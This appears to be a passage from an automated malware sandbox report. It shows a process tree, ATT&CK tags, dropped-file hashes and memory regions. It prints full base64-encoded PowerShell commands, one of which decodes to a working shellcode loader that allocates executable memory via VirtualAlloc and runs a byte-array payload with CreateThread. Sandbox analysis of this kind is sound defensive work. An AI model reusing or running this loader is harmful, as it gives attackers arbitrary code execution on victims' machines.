ACIAJgAgACQAQQBGADAAIAAkAEUAdgAzAHYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQARQB2ADMAdgAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAAwAFIAQwAyACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAMABSAEMAMgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiADgALAAwAHgAOAA4ACwAMAB4ADkAZAAsADAAeAAwAGIALAAwAHgAYwA3ACwAMAB4ADUAZQAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4ADQAZQAsADAAeAA5ADkALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeABiADIALAAwAHgANABhACwAMAB4ADYAMgAsADAAeABiAGMALAAwAHgANABhACwAMAB4ADgAYgAsADAAeAAxAGQALAAwAHgAMwA0ACwAMAB4AGEAZgAsADAAeABiAGEALAAwAHgAMABmACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgAZQBmACwAMAB4ADkAZgAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeAA2AGIALAAwAHgANgA0ACwAMAB4ADEAOAAsADAAeAA5ADcALAAwAHgAMQA5ACwAMAB4AGEAMQAsADAAeAAyAGYALAAwAHgAMQAwACwAMAB4ADkANwAsADAAeAA5ADcALAAwAHgAMQBlACwAMAB4AGEAMQAsADAAeAAxADkALAAwAHgAMQA4ACwAMAB4AGMAYwAsADAAeAA2ADEALAAwAHgAMwBiACwAMAB4AGUANAAsADAAeAAwAGUALAAwAHgAYgA2ACwAMAB4ADkAYgAsADAAeABkADUALAAwAHgAYwAxACwAMAB4AGMAYgAsADAAeABkAGEALAAwAHgAMQAyACwAMAB4ADkANAAsADAAeABhADYALAAwAHgAMwAzACwAMAB4AGMAZQAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4AGQAYwAsADAAeABiADgALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeABlADAALAAwAHgANAA3ACwAMAB4AGUAYwAsADAAeAA1ADUALAAwAHgANQA4ACwAMAB4ADMAMAAsADAAeAA4ADkALAAwAHgAYQBhACwAMAB4ADIAZAAsADAAeAA4AGMALAAwAHgAOQAwACwAMAB4AGYAYQAsADAAeAA0ADUALAAwAHgANAA0ACwAMAB4ADgAYQAsADAAeAA3ADEALAAwAHgAMAAxACwAMAB4ADcANQAsADAAeABhAGIALAAwAHgANQA2ACwAMAB4AGUAMgAsADAAeABmADAALAAwAHgANgAyACwAMAB4ADIAYwAsADAAeAAzAGYALAAwAHgAYwBhACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAYgA0ACwAMAB4ADEAOAAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4ADEAZAAsADAAeAA1ADEALAAwAHgAMwBlACwAMAB4AGIANAAsADAAeAA2ADAALAAwAHgANQBkACwAMAB4AGIAMwAsADAAeABjADQALAAwAHgAYQA1ACwAMAB4ADUAYQAsADAAeAAyAGIALAAwAHgAYgAzACwAMAB4AGQAZAAsADAAeAA5ADgALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA0ADAALAAwAHgAYgBhACwAMAB4ADQANAAsADAAeABjADcALAAwAHgAZgAyACwAMAB4ADEAZQAsADAAeAA3ADQALAAwAHgAMAA0ACwAMAB4ADYANAAsADAAeABkADQALAAwAHgANwBhACwAMAB4AGUAMQAsADAAeABlADIALAAwAHgAYgAyACwAMAB4ADkAZQAsADAAeABmADQALAAwAHgAMgA3ACwAMAB4AGMAOQAsADAAeAA5AGIALAAwAHgANwBkACwAMAB4AGMANgAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4AGMANQAsADAAeABlAGQALAAwAHgAYgBhACwAMAB4ADcANgAsADAAeAA5AGUALAAwAHgAOABjACwAMAB4ADkAYgAsADAAeABkADIALAAwAHgANwAxACwAMAB4AGIAMAAsADAAeABmAGMALAAwAHgAYgBiACwAMAB4ADIAZQAsADAAeAAxADQALAAwAHgANwA2ACwAMAB4ADIAOQAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADcANwAsADAAeABiADEALAAwAHgANAA2ACwAMAB4ADcANAAsADAAeABlADAALAAwAHgANwBkACwAMAB4ADgAYQAsADAAeAA4ADcALAAwAHgAZgAwACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgAZgA0ACwAMAB4AGMAMgAsADAAeABiADYALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAA2AGUALAAwAHgAMwBlACwAMAB4ADkAMwAsADAAeAA2ADQALAAwAHgAZQA2ACwAMAB4ADIAOAAsADAAeAAyADQALAAwAHgAYgBhACwAMAB4ADQAMAAsADAAeAAzADgALAAwAHgAZABiACwAMAB4ADMAYgAsADAAeABiADEALAAwAHgAMQAwACwAMAB4ADEAZgAsADAAeAA2AGYALAAwAHgAZQAxACwAMAB4ADAAYQAsADAAeABiADYALAAwAHgAMQAwACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAMwA3ACwAMAB4AGMANQAsADAAeAAwADcALAAwAHgAYwAxACwAMAB4AGEAZgAsADAAeAAyADYALAAwAHgANwBmACwAMAB4AGMANwAsADAAeAA0ADUALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgAOAA4ACwAMAB4AGIAOAAsADAAeAAwAGEALAAwAHgAMABlACwAMAB4AGYAYQAsADAAeAA5ADYALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeABiAGEALAAwAHgANAA2ACwAMAB4ADEAZAAsADAAeAA0AGYALAAwAHgANQAyACwAMAB4ADgAZAAsADAAeAA5ADIALAAwAHgAYgAwACwAMAB4ADQAMgAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgANAAxACwAMAB4AGQANQAsADAAeABiADEALAAwAHgAOAA0ACwAMAB4AGYAOAAsADAAeAA3AGMALAAwAHgANAA5ACwAMAB4ADMANQAsADAAeAAwADQALAAwAHgAYQBiACwAMAB4ADMANwAsADAAeAA3ADUALAAwAHgAOABlACwAMAB4ADUAOAAsADAAeABjADcALAAwAHgAMwBiACwAMAB4ADYANwAsADAAeAAxADQALAAwAHgAZABiACwAMAB4AGEAYgAsADAAeAA4ADcALAAwAHgANgAzACwAMAB4ADgAMQAsADAAeAA3AGQALAAwAHgAOQA3ACwAMAB4ADUAOQAsADAAeABhAGMALAAwAHgAOAAxACwAMAB4ADAAZAAsADAAeAA2ADYALAAwAHgANgA3ACwAMAB4AGQANgAsADAAeABiADkALAAwAHgANgA0ACwAMAB4ADUAZQAsADAAeAAxADAALAAwAHgANgA2ACwAMAB4ADkANgAsADAAeABiADUALAAwAHgAMgBiACwAMAB4AGEAZgAsADAAeAAwADIALAAwAHgANwA2ACwAMAB4ADQAMwAsADAAeABkADAALAAwAHgAYwAyACwAMAB4ADcANgAsADAAeAA5ADMALAAwAHgAOAA2ACwAMAB4ADgAOAAsADAAeAA3ADYALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABlADkALAAwAHgAMgA0ACwAMAB4ADEAZQAsADAAeAA4ADEALAAwAHgAMgA0ACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgAMQA0ACwAMAB4AGMANwAsADAAeAAwADgALAAwAHgANgAwACwAMAB4AGIAZQAsADAAeABhAGYALAAwAHgAYgA2ACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgANgBmACwAMAB4ADQAOAAsADAAeAA4AGEALAAwAHgAMAA4ACwAMAB4ADUAMwAsADAAeAA5AGYALAAwAHgAZgAyACwAMAB4ADcAZQAsADAAeABiAGQALAAwAHgAMgAzADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABPAFYAUQBKAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABPAFYAUQBKAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABPAFYAUQBKACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zbjhdeh\2zbjhdeh.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2268
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC469.tmp" "c:\Users\Admin\AppData\Local\Temp\2zbjhdeh\CSCAC5BA9DEAFF3429E91BE122F306A1666.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2zbjhdeh\2zbjhdeh.dll

Filesize
3KB

MD5
236e289b706d003768b510fe4b723685

SHA1
ee491f0b50be6737599a728278708761e048e242

SHA256
cf367295767df1ea9cd0711fa31f2048c23d8e66535dc5bcc6d8e79c54c6ee42

SHA512
8530c0f92c99d0c70fa6dde7231a0da8a2822fa3eeabcdcac4661cca62e7d00468b59a5eaef7c3153520cc2a2999dae2dd3e586be34915f23d1fee9b00b56bd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC469.tmp

Filesize
1KB

MD5
07e80df0ca9958eeb40f07e34328f4b8

SHA1
930fff9f7522d613575626b873cbc9c9b30d0c13

SHA256
85b0d4b39628e083018a8158de2848baf0251ebb04610903b0cdf6fab8d3c83f

SHA512
2512e5785f977bdcdf44e4292b8e2c9d1ef783710019ca2b16f57be62ca96d6ee0c934c1181c2d98fc9c7d64f6a1c19e14daad4ed60ae714d70c9267882a0b4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mjb4atjy.ddo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2zbjhdeh\2zbjhdeh.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2zbjhdeh\2zbjhdeh.cmdline

Filesize
369B

MD5
036a9c4add748c01295f40a1665c346d

SHA1
d609626ad50e5edc85f42f1a23d4fb078908617e

SHA256
e795e418b9f952af6feab8c1b5a30f33221ab3524d9c5caa193312b05701d6c1

SHA512
e53a04b38a90c1b68b5f65ab5edbf6e00fd24192f7bc9e459cac15f9a08c34f4cc76d0e56f53a1b90da6cca63b286014fc21fe71ed861d6ee6bed056f3471827

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2zbjhdeh\CSCAC5BA9DEAFF3429E91BE122F306A1666.TMP

Filesize
652B

MD5
c68822d706c992032cbddc6a4ae4c7dd

SHA1
2d79a04c63084385efc065f7a7a77e7d155650f2

SHA256
f22b60cb87ca4756ade2697bb5b47b4c0e86d0af38dce7c09860c56aa21fe7b6

SHA512
b9a3f2c2aa3632dcf5cd4ca66e0e1436df9d9d5d1ba25efceec2d8e38d3b33d423e4bf3229a2e2afeb208f44895f06d5283f0162ed9a7bdd1c23770d47d9434a

Download Submit
memory/720-1-0x00007FFC0D293000-0x00007FFC0D295000-memory.dmp

Filesize
8KB

Download
memory/720-0-0x0000000000FD0000-0x0000000000FDA000-memory.dmp

Filesize
40KB

Download
memory/968-11-0x0000021DA7A80000-0x0000021DA7AA2000-memory.dmp

Filesize
136KB

Download
memory/968-51-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/968-14-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/968-13-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/968-12-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/4896-15-0x00000000752FE000-0x00000000752FF000-memory.dmp

Filesize
4KB

Download
memory/4896-18-0x00000000752F0000-0x0000000075AA0000-memory.dmp

Filesize
7.7MB

Download
memory/4896-32-0x00000000055B0000-0x0000000005904000-memory.dmp

Filesize
3.3MB

Download
memory/4896-33-0x0000000005A70000-0x0000000005A8E000-memory.dmp

Filesize
120KB

Download
memory/4896-34-0x0000000005AA0000-0x0000000005AEC000-memory.dmp

Filesize
304KB

Download
memory/4896-35-0x00000000072C0000-0x000000000793A000-memory.dmp

Filesize
6.5MB

Download
memory/4896-36-0x0000000005F80000-0x0000000005F9A000-memory.dmp

Filesize
104KB

Download
memory/4896-21-0x0000000005230000-0x0000000005296000-memory.dmp

Filesize
408KB

Download
memory/4896-20-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/4896-31-0x00000000052A0000-0x0000000005306000-memory.dmp

Filesize
408KB

Download
memory/4896-19-0x00000000752F0000-0x0000000075AA0000-memory.dmp

Filesize
7.7MB

Download
memory/4896-17-0x0000000004B30000-0x0000000005158000-memory.dmp

Filesize
6.2MB

Download
memory/4896-49-0x0000000006010000-0x0000000006018000-memory.dmp

Filesize
32KB

Download
memory/4896-16-0x0000000004440000-0x0000000004476000-memory.dmp

Filesize
216KB

Download
memory/4896-52-0x0000000006C40000-0x0000000006C41000-memory.dmp

Filesize
4KB

Download
memory/4896-53-0x00000000752FE000-0x00000000752FF000-memory.dmp

Filesize
4KB

Download
memory/4896-54-0x00000000752F0000-0x0000000075AA0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads